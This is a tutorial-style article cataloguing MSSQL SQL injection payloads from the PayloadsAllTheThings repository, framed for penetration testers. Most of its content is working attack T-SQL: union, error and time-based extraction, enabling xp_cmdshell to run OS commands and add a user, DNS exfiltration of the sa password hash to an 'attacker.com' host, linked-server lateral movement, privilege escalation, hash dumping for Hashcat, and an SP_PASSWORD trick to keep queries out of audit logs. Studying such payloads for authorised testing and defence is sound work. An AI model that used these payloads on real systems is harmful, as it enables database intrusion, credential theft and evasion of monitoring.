# MSSQL Specific SQL Injection Payloads: Complete T-SQL Exploitation Guide

> Master MSSQL SQL injection with comprehensive T-SQL payloads from swisskyrepo. Explore enumeration, exploitation, and post-exploitation techniques for effective penetration testing.

- Repository: [Swissky/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
- Tags: tutorial
- Published: 2026-03-01

---

**The PayloadsAllTheThings repository catalogs comprehensive MSSQL-specific SQL injection payloads covering enumeration, union-based extraction, error-based leakage, time-based blind detection, stacked query execution, and post-exploitation techniques including OS command execution via `xp_cmdshell` and credential dumping from `master..sysxlogins`.**

When penetration testers encounter Microsoft SQL Server backends, they require specialized T-SQL syntax to exploit injection vulnerabilities effectively. The **swisskyrepo/PayloadsAllTheThings** repository serves as the definitive reference for **MSSQL specific SQL injection payloads**, organizing techniques from basic enumeration to advanced out-of-band data exfiltration in the file `SQL Injection/MSSQL Injection.md`.

## Comment Syntax and Query Termination

MSSQL supports multiple comment styles that allow attackers to truncate existing queries and append malicious T-SQL. According to the source code analysis, these syntax variations bypass naive input filters by terminating statements early or hiding payload components.

**Line comments** use double hyphens (`--`) which require a trailing space or require the next character to be non-alphanumeric. **Block comments** use `/* … */` syntax to embed payloads within seemingly benign syntax. Additionally, the null byte sequence `;%00` can truncate queries in certain web application configurations.

```sql
' OR 1=1--
' OR 1=1/* 
';%00

```

## Enumeration Payloads for MSSQL Reconnaissance

Before exploitation, attackers must map the database architecture. The repository documents specific system variables and functions in `SQL Injection/MSSQL Injection.md` that reveal server configuration and privilege levels.

Query these built-in functions to establish a baseline:

```sql
SELECT @@version;               -- Database version and patch level
SELECT DB_NAME();               -- Current database context
SELECT HOST_NAME();             -- Server hostname
SELECT CURRENT_USER;            -- Active database principal
SELECT SYSTEM_USER;             -- Underlying OS account
SELECT IS_SRVROLEMEMBER('sysadmin'); -- Check sysadmin status (returns 1 if true)

```

## Data Extraction Methodologies

### Union-Based Injection

**Union-based attacks** merge attacker-controlled result sets with legitimate query outputs. MSSQL requires matching data types and column counts between the original query and the injected `UNION SELECT` statement.

Extract password hashes from the legacy `sysxlogins` table:

```sql
' UNION SELECT NULL, name, master.dbo.fn_varbintohexstr(password), NULL FROM master..sysxlogins-- 

```

### Error-Based Data Leakage

When application error messages are displayed but direct output is suppressed, **error-based techniques** force type conversion errors to leak data. The repository highlights the `CONVERT()` function to trigger integer conversion failures on string concatenations.

```sql
AND 1337=CONVERT(INT,(SELECT '~'+(SELECT @@version)+'~'))-- 

```

This payload forces MSSQL to attempt converting the concatenated version string to an integer, causing the server to return the full version number within the error message.

### Boolean-Based Blind Detection

In environments where error messages are suppressed, **blind SQL injection** uses boolean conditions to infer data bit-by-bit. The source documents `LEN()` and `SUBSTRING()` functions to test character lengths and values sequentially.

Test if the first password hash contains 32 characters:

```sql
AND LEN((SELECT TOP 1 password FROM master..sysxlogins))=32-- 

```

### Time-Based Confirmation

**Time-based blind injection** induces measurable delays using `WAITFOR DELAY` to confirm true/false conditions without visual output. This technique works even when the application returns identical HTTP responses for both states.

```sql
'; IF (SELECT IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:10'-- 

```

If the current user possesses sysadmin privileges, the server pauses for ten seconds before responding.

## Advanced Exploitation: Stacked Queries and Command Execution

MSSQL supports **stacked queries** (multiple statements separated by semicolons), enabling arbitrary configuration changes and command execution. The repository details the specific sequence required to enable `xp_cmdshell`, a stored procedure that executes operating system commands.

Enable command execution capabilities:

```sql
'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE-- 

```

Execute OS commands with full system privileges:

```sql
EXEC master.dbo.xp_cmdshell 'whoami';
EXEC master.dbo.xp_cmdshell 'net user attacker P@ssword /add';

```

For SQL Server 2016 and later, the repository also documents `sp_execute_external_script` as an alternative command execution vector using Python or R scripts when `xp_cmdshell` is disabled.

## Post-Exploitation Techniques

### File System Manipulation

Attackers can read arbitrary files using `OPENROWSET` with the `BULK` provider or write files via OLE Automation procedures. The `SQL Injection/MSSQL Injection.md` file catalogs these techniques for web shell deployment and configuration harvesting.

Read the Windows boot configuration:

```sql
SELECT BulkColumn FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS x;

```

### Out-of-Band Data Exfiltration

**Out-of-band (OOB)** techniques bypass network restrictions by forcing the database server to initiate external connections. The repository documents DNS exfiltration using extended event file targets and UNC path resolution.

Exfiltrate the SA password hash via DNS lookup:

```sql
1 AND EXISTS(SELECT * FROM fn_xe_file_target_read_file('C:\*.xel','\\'+ (SELECT password FROM master..syslogins WHERE name='sa') +'.attacker.com\log.xel',NULL,NULL))-- 

```

### Lateral Movement via Trusted Links

MSSQL linked servers enable **trusted link exploitation** for lateral movement across database instances. Attackers can execute queries or commands on remote hosts by targeting linked server objects.

Execute commands on a linked server named `LinkedServer`:

```sql
EXEC('EXEC master..xp_cmdshell ''net user attacker P@ssword /add''') AT LinkedServer;

```

### Privilege Escalation

The repository documents direct role assignment using `sp_addsrvrolemember` to escalate database users to sysadmin status:

```sql
EXEC master.dbo.sp_addsrvrolemember 'attacker','sysadmin';

```

### Credential Dumping

Extract password hashes from `master..sysxlogins` or `sys.sql_logins` for offline cracking. The `fn_varbintohexstr` function converts binary hash values to hexadecimal strings compatible with Hashcat (mode 131).

```sql
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins;

```

## Operational Security for MSSQL Attacks

The **OPSEC** section in `SQL Injection/MSSQL Injection.md` describes techniques to minimize forensic footprints. Prepending payloads with `SP_PASSWORD` prevents MSSQL from logging the query text to audit trails, as the server treats these as password-related operations and omits them from standard traces.

```sql
SP_PASSWORD; EXEC master.dbo.xp_cmdshell 'whoami';

```

## Summary

- **MSSQL specific SQL injection payloads** require T-SQL syntax knowledge, utilizing system functions like `@@version`, `DB_NAME()`, and `IS_SRVROLEMEMBER()` for initial reconnaissance.
- **Union-based extraction** demands data type alignment, while **error-based** techniques leverage `CONVERT()` failures to leak data through exception messages.
- **Blind and time-based** methods use `WAITFOR DELAY` and boolean logic to infer information when direct output is unavailable.
- **Stacked queries** enable configuration changes and `xp_cmdshell` activation for operating system command execution.
- **Out-of-band exfiltration** via `fn_xe_file_target_read_file` and DNS lookups bypasses network egress restrictions.
- **Trusted links** facilitate lateral movement across SQL Server instances using the `AT LinkedServer` syntax.
- **Credential dumping** from `master..sysxlogins` combined with `fn_varbintohexstr()` produces Hashcat-compatible hashes for offline cracking.

## Frequently Asked Questions

### What distinguishes MSSQL injection payloads from MySQL or PostgreSQL techniques?

**MSSQL injection payloads** rely on Transact-SQL (T-SQL) syntax including `WAITFOR DELAY` for time-based detection, stacked queries separated by semicolons, and system stored procedures like `xp_cmdshell` that have no direct equivalent in MySQL. The `master` database contains critical system tables like `sysxlogins` that differ from MySQL's `mysql.user` table structure.

### How do you enable command execution via SQL injection in MSSQL?

You must first enable advanced options and then activate `xp_cmdshell` using a **stacked query** sequence: `EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE`. Once enabled, `EXEC master.dbo.xp_cmdshell 'command'` executes arbitrary operating system commands.

### Which technique works best for blind MSSQL injection without error output?

**Time-based blind injection** using `WAITFOR DELAY '0:0:5'` is the most reliable method when error messages are suppressed and union-based extraction fails. Boolean-based blind techniques using `AND LEN((SELECT ...))=X` also work but require more requests to enumerate data character-by-character.

### How can attackers exfiltrate data when outbound HTTP traffic is blocked?

**Out-of-band (OOB) techniques** force the MSSQL server to resolve DNS names or access UNC paths containing sensitive data. The repository documents using `fn_xe_file_target_read_file` with a UNC path like `\\attacker.com\log.xel` or the `master.dbo.dnscmd` equivalent to tunnel data through DNS queries, bypassing firewall restrictions on HTTP/HTTPS traffic.